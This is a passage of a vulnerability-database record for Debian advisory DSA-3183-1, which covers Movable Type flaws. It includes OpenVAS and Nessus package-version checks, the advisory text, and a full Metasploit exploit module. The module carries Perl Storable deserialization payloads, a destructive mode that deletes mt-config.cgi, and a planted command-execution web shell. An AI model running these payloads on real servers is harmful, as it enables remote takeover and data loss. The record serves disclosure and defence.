identifies the following problems:\n\nCVE-2013-2184 \nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057 \nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592 \nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2015-03-12T00:00:00", "id": "OPENVAS:703183", "href": "http://plugins.openvas.org/nasl.php?oid=703183", "type": "openvas", "title": "Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3183.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3183-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703183);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2013-2184\", \"CVE-2014-9057\", \"CVE-2015-1592\");\n script_name(\"Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-12 00:00:00 +0100 (Thu, 12 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3183.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"movabletype-opensource on Debian Linux\");\n script_tag(name: \"insight\", value: \"MovableType is a popular blogging,\nor web publishing platform. It provides an easy to use web interface to\npublishing blogs and contains many features and plugins.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.1.4+dfsg-4+deb7u2.\n\nWe recommend that you upgrade your movabletype-opensource packages.\");\n script_tag(name: \"summary\", value: \"Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184 \nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057 \nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592 \nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"movabletype-opensource\", ver:\"5.1.4+dfsg-4+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"movabletype-plugin-core\", ver:\"5.1.4+dfsg-4+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"movabletype-plugin-zemanta\", ver:\"5.1.4+dfsg-4+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184\nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057\nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592\nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.", "modified": "2019-03-18T00:00:00", "published": "2015-03-12T00:00:00", "id": "OPENVAS:1361412562310703183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703183", "type": "openvas", "title": "Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3183.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3183-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703183\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2013-2184\", \"CVE-2014-9057\", \"CVE-2015-1592\");\n script_name(\"Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-12 00:00:00 +0100 (Thu, 12 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3183.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"movabletype-opensource on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.1.4+dfsg-4+deb7u2.\n\nWe recommend that you upgrade your movabletype-opensource packages.\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184\nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057\nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592\nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"movabletype-opensource\", ver:\"5.1.4+dfsg-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"movabletype-plugin-core\", ver:\"5.1.4+dfsg-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"movabletype-plugin-zemanta\", ver:\"5.1.4+dfsg-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-14T22:46:41", "description": "This module exploits a serialization flaw in MovableType before 5.2.12 to execute arbitrary code. The default nondestructive mode depends on the target server having the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. The destructive mode of operation uses only required MovableType dependencies, but it will noticeably corrupt the MovableType installation.\n", "published": "2015-05-03T19:18:01", "type": "metasploit", "title": "SixApart MovableType Storable Perl Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1592"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/SIXAPART_MOVABLETYPE_STORABLE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SixApart MovableType Storable Perl Code Execution',\n 'Description' => %q{\n This module exploits a serialization flaw in MovableType before 5.2.12 to execute\n arbitrary code. The default nondestructive mode depends on the target server having\n the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.\n The destructive mode of operation uses only required MovableType dependencies,\n but it will noticeably corrupt the MovableType installation.\n },\n 'Author' =>\n [\n 'John Lightsey',\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-1592' ],\n [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' => ' ',\n 'Space' => 1024,\n },\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Automatic', {}]],\n 'DisclosureDate' => '2015-02-11',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),\n OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])\n ], self.class\n )\n\n end\n\n=begin\n\n#!/usr/bin/perl\n\n# generate config parameters for injection checks\n\nuse Storable;\n\n{\n\n package XXXCHECKXXX;\n\n sub STORABLE_thaw {\n return 1;\n }\n\n sub STORABLE_freeze {\n return 1;\n }\n\n}\n\nmy $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});\n$frozen = unpack 'H*', $frozen;\nprint \"LFI test for storable flaw is: $frozen\\n\";\n\n{\n package DateTime;\n use overload '+' => sub { 'ignored' };\n}\n\n=end\n\n def check\n vprint_status(\"Sending storable test injection for XXXCHECKXXX.pm load failure\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'retry',\n 'step' => 'configure',\n 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'\n }\n })\n\n unless res && res.code == 200 && res.body.include?(\"Can't locate XXXCHECKXXX.pm\")\n vprint_error(\"Failed XXXCHECKXXX.pm load test\");\n return Exploit::CheckCode::Safe\n end\n Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n if datastore['DESTRUCTIVE']\n exploit_destructive\n else\n exploit_nondestructive\n end\n end\n\n=begin\n\n#!/usr/bin/perl\n\n# Generate nondestructive config parameter for RCE via Object::MultiType\n# and Try::Tiny. The generated value requires minor modification to insert\n# the payload inside the system() call and resize the padding.\n\nuse Storable;\n\n{\n package Object::MultiType;\n use overload '+' => sub { 'ingored' };\n}\n\n{\n package Object::MultiType::Saver;\n}\n\n{\n package DateTime;\n use overload '+' => sub { 'ingored' };\n}\n\n{\n package Try::Tiny::ScopeGuard;\n}\n\nmy $try_tiny_loader = bless {}, 'DateTime';\nmy $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';\nmy $multitype_coderef = bless \\$multitype_saver, 'Object::MultiType';\nmy $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\\n\\n};system(q{});' . ('#' x 1025) . \"\\nexit;\"], 'Try::Tiny::ScopeGuard';\n\nmy $data = [$try_tiny_loader, $try_tiny_executor];\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);\n$frozen = unpack 'H*', $frozen;\nprint \"RCE payload requiring Object::MultiType and DateTime: $frozen\\n\";\n\n=end\n\n def exploit_nondestructive\n print_status(\"Using nondestructive attack method\")\n config_payload = \"53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b\"\n config_payload << payload.encoded.unpack('H*')[0]\n config_payload << \"7d293b\"\n config_payload << \"23\" * (1025 - payload.encoded.length)\n config_payload << \"0a657869743b\"\n\n print_status(\"Sending payload (#{payload.raw.length} bytes)\")\n\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'retry',\n 'step' => 'configure',\n 'config' => config_payload\n }\n }, 5)\n end\n\n=begin\n\n#!/usr/bin/perl\n\n# Generate destructive config parameter to unlink mt-config.cgi\n\nuse Storable;\n\n{\n package CGITempFile;\n}\n\nmy $unlink_target = \"mt-config.cgi\";\nmy $cgitempfile = bless \\$unlink_target, \"CGITempFile\";\n\nmy $data = [$cgitempfile];\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);\n$frozen = unpack 'H*', $frozen;\nprint \"RCE unlink payload requiring CGI: $frozen\\n\";\n\n=end\n\n def exploit_destructive\n print_status(\"Using destructive attack method\")\n # First we need to delete mt-config.cgi using the storable injection\n\n print_status(\"Sending storable injection to unlink mt-config.cgi\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'retry',\n 'step' => 'configure',\n 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'\n }\n })\n\n if res && res.code == 200\n print_good(\"Successfully sent unlink request\")\n else\n fail_with(Failure::Unknown, \"Error sending unlink request\")\n end\n\n # Now we rewrite mt-config.cgi to accept a payload\n\n print_status(\"Rewriting mt-config.cgi to accept the payload\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'next_step',\n 'step' => 'optional',\n 'default_language' => 'en_us',\n 'email_address_main' => \"x\\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\\\n\\\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1\",\n 'set_static_uri_to' => '/',\n 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',\n }\n })\n\n if res && res.code == 200\n print_good(\"Successfully sent mt-config rewrite request\")\n else\n fail_with(Failure::Unknown, \"Error sending mt-config rewrite request\")\n end\n\n # Finally send the payload\n\n print_status(\"Sending payload request\")\n\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt.cgi'),\n 'vars_get' => {\n 'xyzzy' => payload.encoded,\n }\n }, 5)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb"}], "debian": [{"lastseen": "2019-05-30T02:22:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3183-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMarch 12, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : movabletype-opensource\nCVE ID : CVE-2013-2184 CVE-2014-9057 CVE-2015-1592\nDebian Bug : 712602 774192\n\nMultiple vulnerabilities have been discovered in Movable Type, a\nblogging system. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2013-2184\n\n Unsafe use of Storable::thaw in the handling of comments to blog\n posts could allow remote attackers to include and execute arbitrary\n local Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057\n\n Netanel Rubin from Check Point Software Technologies discovered a\n SQL injection vulnerability in the XML-RPC interface allowing\n remote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592\n\n The Perl Storable::thaw function is not properly used, allowing\n remote attackers to include and execute arbitrary local Perl files\n and possibly remotely execute arbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 5.1.4+dfsg-4+deb7u2.\n\nWe recommend that you upgrade your movabletype-opensource packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2015-03-12T15:22:50", "published": "2015-03-12T15:22:50", "id": "DEBIAN:DSA-3183-1:59B04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00068.html", "title": "[SECURITY] [DSA 3183-1] movabletype-opensource security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:48:59", "description": "Multiple vulnerabilities have been discovered in Movable Type, a\nblogging system. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2013-2184\n Unsafe use of Storable::thaw in the handling of comments\n to blog posts could allow remote attackers to include\n and execute arbitrary local Perl files or possibly\n remotely execute arbitrary code.\n\n - CVE-2014-9057\n Netanel Rubin from Check Point Software Technologies\n discovered a SQL injection vulnerability in the XML-RPC\n interface allowing remote attackers to execute arbitrary\n SQL commands.\n\n - CVE-2015-1592\n The Perl Storable::thaw function is not properly used,\n allowing remote attackers to include and execute\n arbitrary local Perl files and possibly remotely execute\n arbitrary code.", "edition": 15, "published": "2015-03-13T00:00:00", "title": "Debian DSA-3183-1 : movabletype-opensource - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "modified": "2015-03-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:movabletype-opensource", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3183.NASL", "href": "https://www.tenable.com/plugins/nessus/81793", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3183. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81793);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2184\", \"CVE-2014-9057\", \"CVE-2015-1592\");\n script_xref(name:\"DSA\", value:\"3183\");\n\n script_name(english:\"Debian DSA-3183-1 : movabletype-opensource - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in Movable Type, a\nblogging system. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2013-2184\n Unsafe use of Storable::thaw in the handling of comments\n to blog posts could allow remote attackers to include\n and execute arbitrary local Perl files or possibly\n remotely execute arbitrary code.\n\n - CVE-2014-9057\n Netanel Rubin from Check Point Software Technologies\n discovered a SQL injection vulnerability in the XML-RPC\n interface allowing remote attackers to execute arbitrary\n SQL commands.\n\n - CVE-2015-1592\n The Perl Storable::thaw function is not properly used,\n allowing remote attackers to include and execute\n arbitrary local Perl files and possibly remotely execute\n arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712602\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1592\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/movabletype-opensource\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3183\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the movabletype-opensource packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 5.1.4+dfsg-4+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SixApart MovableType Storable Perl Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:movabletype-opensource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"movabletype-opensource\", reference:\"5.1.4+dfsg-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"movabletype-plugin-core\", reference:\"5.1.4+dfsg-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"movabletype-plugin-zemanta\", reference:\"5.1.4+dfsg-4+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3183-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nMarch 12, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : movabletype-opensource\r\nCVE ID : CVE-2013-2184 CVE-2014-9057 CVE-2015-1592\r\nDebian Bug : 712602 774192\r\n\r\nMultiple vulnerabilities have been discovered in Movable Type, a\r\nblogging system. The Common Vulnerabilities and Exposures project\r\nidentifies the following problems:\r\n\r\nCVE-2013-2184\r\n\r\n Unsafe use of Storable::thaw in the handling of comments to blog\r\n posts could allow remote attackers to include and execute arbitrary\r\n local Perl files or possibly remotely execute arbitrary code.\r\n\r\nCVE-2014-9057\r\n\r\n Netanel Rubin from Check Point Software Technologies discovered a\r\n SQL injection vulnerability in the XML-RPC interface allowing\r\n remote attackers to execute arbitrary SQL commands.\r\n\r\nCVE-2015-1592\r\n\r\n The Perl Storable::thaw function is not properly used, allowing\r\n remote attackers to include and execute arbitrary local Perl files\r\n and possibly remotely execute arbitrary code.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 5.1.4+dfsg-4+deb7u2.\r\n\r\nWe recommend that you upgrade your movabletype-opensource packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJVAa8VAAoJEAVMuPMTQ89E6aIP/ix6u/0PcbNUQ5hx6onnWhad\r\nI8tZAxLHIfh01+JZbry9MnadnXC11RshnpaztBB82s+ZYVUPq0+wqBsRPm31iRa1\r\nLdjOz/xttoqqqP+wwHbQ/MyGEaDV8KDP/4wWr5TITnQGJjvVW2ZN/ijEHi2G6omg\r\now2s2flvvW5UWB/0Jwvr4aD1JU3DH4U29p9KwRRge8ytIJ1d7VMcHBWVaRjSiVfd\r\n2yxwSdp30RMCOy8m7WsiEHssfHY6PNK0tXphE9UOV/bR+ESSmC3DR+n6XxLZHAvY\r\nyGMCkAs/rnomo/skdn1KFEshj+9znT1AzhjyJzrfspujm9nL6WhXgYwEcBtySNnv\r\nJDHd41WXbvRvkg9zXFOwJ/1WTnQsM4e7R0vH94WMNnJbgxJTgUaG7Ym6jv1aiAD5\r\nqFVCBWixdyPWyrXUMRi9tZdYKUIpoyzCakbe6LoLtWlmdk2BzVFBKbp3uHerMbB2\r\nrw1J7rTKq7iILU2b/qVOuDoZGkenndC/EAmyqOuTvjrvKy+wuiY7j0TEbLIvqnDT\r\nmfUJpA7HQMCBcRd5cai06OEh2fM33uHICbyCkxBgUoEFZ/SGx7OXvpDRlLzaSM0Y\r\nRK7zILxn4+igsSigE8g9K4ogn9M8l25wVcefPYSAon/voFdyKMe/NLqI81218nb6\r\nqvErBYcK2WeTFrDeN7Qy\r\n=eA9w\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-03-23T00:00:00", "published": "2015-03-23T00:00:00", "id": "SECURITYVULNS:DOC:31849", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31849", "title": "[SECURITY] [DSA 3183-1] movabletype-opensource security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": 